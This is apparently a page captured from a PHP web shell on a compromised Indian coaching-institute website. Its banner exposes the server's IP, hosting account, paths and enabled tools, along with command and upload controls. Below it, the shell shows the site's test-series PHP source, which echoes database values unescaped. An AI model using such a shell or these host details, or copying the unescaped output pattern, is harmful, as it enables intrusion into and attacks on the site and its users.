Server IP : 103.53.40.154 / Your IP : 3.21.159.223 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leetcoaching.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include("top-link.php") ?> <title>Best LEET Preparation in Delhi</title> <meta name="description" content="The Best LEET Preparation can happen only by joining the Best LEET Coaching Classes in Delhi. Join Mission Engineering Now."> </head> <body> <?php include("header.php"); ?> <main> <div class="it-breadcrumb-area it-breadcrumb-bg" data-background="<?php echo $wspath;?>assets/img/breadcrumb/breadcrumb.jpg"> <div class="container"> <div class="row "> <div class="col-md-12"> <div class="it-breadcrumb-content z-index-3 text-center"> <div class="it-breadcrumb-title-box"> <h1 class="it-breadcrumb-title">Test Series Of LEET Coaching</h1> </div> <div class="it-breadcrumb-list-wrap"> <div class="it-breadcrumb-list"> <span><a href="<?php echo $wspath;?>">home</a></span> <span class="dvdr">//</span> <span>Test Series Of LEET Coaching</span> </div> </div> </div> </div> </div> </div> </div> <div class="container" style="margin-top:50px;"> <div class="row" style="margin: auto; padding-bottom: 20px;"> <div class="table-responsive"> <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0"> <thead> <tr> <th>Sr. No.</th> <th>Test Name</th> <th>Date</th> <th>Time</th> <th>Link</th> </tr> </thead> <tbody> <?php $sqltestser = "SELECT * FROM `tbl_testseries`"; $runtestser = mysqli_query($db,$sqltestser) or die("Query Not run"); $count=0; while($datatestser = mysqli_fetch_assoc($runtestser)){ if(mysqli_num_rows($runtestser) > 0){ $count++; ?> <tr> <td><?php echo $count?></td> <td><?php echo $datatestser['test_name']?></td> <td><?php echo $datatestser['test_date']?></td> <td><?php echo $datatestser['test_time']?></td> <td> <a href="<?php echo $datatestser['link']?>" target="_blank"><button class="btn btn-success">Go Link</button></a> </td> </tr> <?php }else{ echo "<h1>No Data Found</h1>"; } } ?> </tbody> </table> </div> </div> </div> </main> <?php include("footer.php"); ?> </body> </html>